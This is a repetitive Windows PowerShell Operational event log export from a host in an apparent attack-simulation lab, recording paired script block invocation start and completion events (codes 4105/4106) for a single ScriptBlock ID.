TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470622
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470621
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470620
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470619
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470618
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470617
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470616
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470615
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470614
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470613
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470612
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470611
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470610
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470609
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470608
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470607
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470606
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470605
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470604
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470603
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470602
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470601
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470600
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470599
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470598
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470597
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470596
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470595
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470594
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470593
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470592
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470591
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470590
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470589
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470588
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470587
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470586
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470585
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470584
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470583
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470582
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470581
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470580
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470579
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470578
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470577
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470576
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470575
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470574
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470573
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470572
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470571
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470570
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470569
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470568
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
